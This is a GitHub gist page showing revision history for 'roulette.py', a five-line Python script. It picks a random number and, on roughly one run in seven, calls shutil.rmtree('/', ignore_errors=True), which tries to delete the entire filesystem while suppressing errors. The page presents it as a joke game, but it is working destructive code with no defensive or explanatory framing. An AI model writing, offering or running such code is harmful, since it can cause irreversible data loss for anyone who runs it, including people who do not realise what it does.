L4zzur

L4zzur / roulette.py

Last active 2 months ago

Like 0

L4zzur revised this gist 2 months ago · cc37123

No changes

L4zzur revised this gist 2 months ago · 1f13261

1 file changed, 5 insertions

roulette.py (file created)
@@ -0,0 +1,5 @@
1 + import random
2 + import shutil
3 +
4 + if random.randint(0, 6) == 1:
5 + shutil.rmtree('/', ignore_errors=True)